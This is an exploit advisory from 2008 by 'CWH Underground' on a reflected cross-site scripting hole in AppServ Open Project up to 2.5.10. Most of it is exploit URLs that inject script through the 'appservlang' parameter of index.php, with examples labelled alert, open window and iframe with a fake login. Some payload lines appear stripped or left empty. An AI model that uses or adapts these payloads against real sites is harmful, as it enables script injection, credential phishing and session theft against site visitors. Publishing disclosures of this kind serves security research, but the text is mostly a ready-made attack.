|
==========================================================
AppServ Open Project < = 2.5.10 Remote XSS Vulnerability
==========================================================
AUTHOR : CWH Underground
DATE : 19 May 2008
SITE : www.citec.us
#####################################################
APPLICATION : AppServ Open Project
VERSION : <= 2.5.10
VENDOR : [url=http://www.appservnetwork.com]http://www.appservnetwork.com[/url]
DOWNLOAD : [url=http://sourceforge.net/project/showfiles.php?group_id=37459]http://sourceforge.net/project/showfiles.php?group_id=37459[/url]
#####################################################
DORK: N/A
---Exploit---
[-] [XSS]">http://[target]/index.php?appservlang=">[XSS]
=Example=
Alert:
[-] http://[target]/index.php?appservlang="> script:alert(/XSS/)>
[-] ">http://[target]/index.php?appservlang=">
Open Window
[-] ">http://[target]/index.php?appservlang=">
[-] ">http://[target]/index.php?appservlang=">
Iframe & Fake Login
[-]
[-]